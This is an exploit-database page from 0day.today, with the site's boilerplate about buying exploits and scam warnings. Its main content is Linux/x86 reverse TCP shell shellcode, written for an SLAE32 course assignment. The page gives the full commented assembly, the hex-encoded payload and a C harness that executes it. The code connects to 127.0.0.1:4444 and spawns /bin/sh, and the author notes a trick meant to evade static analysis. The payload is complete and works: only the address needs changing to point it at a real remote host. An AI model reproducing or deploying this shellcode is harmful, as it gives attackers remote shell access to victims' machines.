0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (107 Bytes)
/* ; name : Exploit Title: Linux/x86 - TCP reverse shell 127.0.0.1 nullbyte free ; author : Sandro "guly" Zaccarini ; twitter : @theguly ; blog : https://gulyslae.github.io/ ; SLAE32 : SLAE-1037 ; purpose : the program will create a new connection to 127.0.0.1:4444 and spawns a shell ; this code has been written as extramile for SLAE32 assignment 2 ; license : CC-BY-NC-SA global _start section .text _start: ; start by zeroing eax,ebx. not really needed because registers are clean, but better safe than sorry xor eax,eax xor ebx,ebx ; ---------------------------------------------------------------------------------------- ; purpose : create a socket ; references : man socket ; description : ; socketcall is the syscall used to work with socket. i'm going to use this syscall to create and connect ; the very first thing i have to do, is to create the socket itself. by reading references, i see that she needs 3 registers: ; eax => syscall id 0x66 for socketcall, that will be the same for every socketcall call of course and that's why i created a function on top ; ebx => socket call id, that is 0x1 for socket creation ; ecx => pointer to socket args ; ; man socket shows me that socket's args are: ; domain => AF_INET because i'm creating a inet socket, and is 0x2 ; type => tcp is referenced as STREAM, that is 0x1 ; protocol => unneded here because there is no inner protocol, so i'll use 0x0 ; not, i'm creating ecx because a zeroed eax is perfect for the purpose ; arg will be pushed in reverse order with no hardcoded address: 0, 1, 2 push eax inc eax push eax inc eax push eax ; because socketcall needs a pointer, i'm moving esp address to ecx mov ecx,esp ; prepare eax to hold the socketcall value as discussed before. i'm not hardcoding 0x66 to (try to) fool some static analysis: 0x33 is sysacct and looks harmless to me mov al,0x33 add al,0x33 ; because ebx has been zeroed, i can just inc to have it to 1 for socketcall to call socket (pun intended :) ) inc ebx ; do the call and create socket int 0x80 ; because syscall rets to eax, if everything's good, eax will hold socket file descriptor: save it to esi to store it safe for the whole run mov esi,eax ; ---------------------------------------------------------------------------------------- ; purpose : connect to raddr:rport ; references : man connect , man 7 ip ; description : ; eax => syscall id 0x66 for socketcall ; ebx => connect call id, 0x3 taken from linux/net.h ; ecx => pointer to address struct ; ; man connect shows me that args are: ; sockfd => already saved in esi ; address => pointer to ip struct ; addrlen => addrlen is 32bit (0x10) ; ; man 7 ip shows address struct details. arguments are: ; family => AF_INET, so 0x2 ; port => hardcoded 4444 ; addr => 127.0.0.1 ; zero again xor eax,eax ; push arg in reverse and move the pointer to ecx ; prepare stack pointer to addr struct defined in man 7 ip ; as exercise, i'm going to use 127.0.0.1 as remote address, because it contains null bytes ; hex value of 127.0.0.1 is 0x0100007f ; pushing 0x00000000 to esp by using a known null register. i've also could used sub esp,0x8 because i have enough room, or mov eax,[esp] or another zillion of similal instructions push eax mov byte [esp], 0x7f ; now esp is: 0x0000007f mov byte [esp+3],0x01 ; now esp is: 0x0100007f ; push port to bind to, 4444 in hex, to adhere to msf defaults :) push word 0x5c11 ; push AF_INET value as word again inc ebx push word bx ; get stack pointer to ecx mov ecx,esp ; same call to have 0x66 to eax and do socketcall mov al,0x33 add al,0x33 ; push arg, again in reverse order push eax ; pointer to addr struct push ecx ; sockfd, saved before to esi push esi ; stack pointer to ecx again, to feed bind socketcall mov ecx,esp ; ebx is 0x2, i need 0x3 inc ebx ; do the call int 0x80 ; ---------------------------------------------------------------------------------------- ; purpose : create fd used by /bin//sh ; references : man dup2 ; description : every shell has three file descriptor: STDIN(0), STDOUT(1), STDERR(2) ; this code will create said fd ; eax => 0x3f ; ebx => clientid ; ecx => newfd id, said file descriptor ; ; i'm going to create them by looping using ecx, to save some instruction. ecx will start at 2, then is dec and fd is created. ; as soon as ecx is 0, the loop ends ; i'm using a different method from one i've used for bindshell just to try. ; i'll put 0x3 to ecx to start creating STDERR just after dec ; ecx is dirty but edx is 0x0, just swap them ; edit: actually, running from a C code you'll have edx dirty. zero it... xor edx,edx xchg ecx,edx mov cl,0x3 ; copy socket fd to ebx to feed clientid mov ebx,esi ; zero eax and start the loop xor eax,eax ; dup2 call id mov al,0x3f ; dec ecx to have 2,1,0 dec ecx int 0x80 mov al,0x3f ; dec ecx to have 2,1,0 dec ecx int 0x80 mov al,0x3f ; dec ecx to have 2,1,0 dec ecx int 0x80 ; ---------------------------------------------------------------------------------------- ; purpose : spawn /bin//sh ; references : man execve ; description : put /bin//sh on the stack, aligned to 8 bytes to prevent 0x00 in the shellcode itself ; and null terminating it by pushing a zeroed register at first ; eax => execve call, 0xB ; ebx => pointer to executed string, which will be /bin//sh null terminated ; ecx => pointer to args to executed command, that could be 0x0 ; edx => pointer to environment, which could be 0x0 ; ; i need to push a null byte to terminate the string, i know ecx is 0x0 so i can save one op push ecx push 0x68732f2f push 0x6e69622f ; here the stack will looks like a null terminated /bin/sh: ; /bin//sh\0\0\0\0\0\0\0\0 ; and place pointer to ebx mov ebx,esp ; envp to edx and ecx push ecx mov edx,esp push ecx mov ecx,esp ; execve syscall here mov al,0xB ; and pop shell int 0x80 ; neat exit xor eax,eax mov al,0x1 int 0x80 */ #include <stdio.h> #include <string.h> unsigned char buf[] = "\x31\xc0\x31\xdb\x50\x40\x50\x40\x50\x89\xe1\xb0\x33\x04\x33\x43\xcd\x80\x89\xc6\x31\xc0\x50\xc6\x04\x24\x7f\xc6\x44\x24\x03\x01\x66\x68\x11\x5c\x43\x66\x53\x89\xe1\xb0\x33\x04\x33\x50\x51\x56\x89\xe1\x43\xcd\x80\x31\xd2\x87\xca\xb1\x03\x89\xf3\x31\xc0\xb0\x3f\x49\xcd\x80\xb0\x3f\x49\xcd\x80\xb0\x3f\x49\xcd\x80\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x51\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"; void main() { printf("Shellcode Length: %d\n", strlen(buf)); int (*ret)() = (int(*)())buf; ret(); } # 0day.today [2024-12-24] #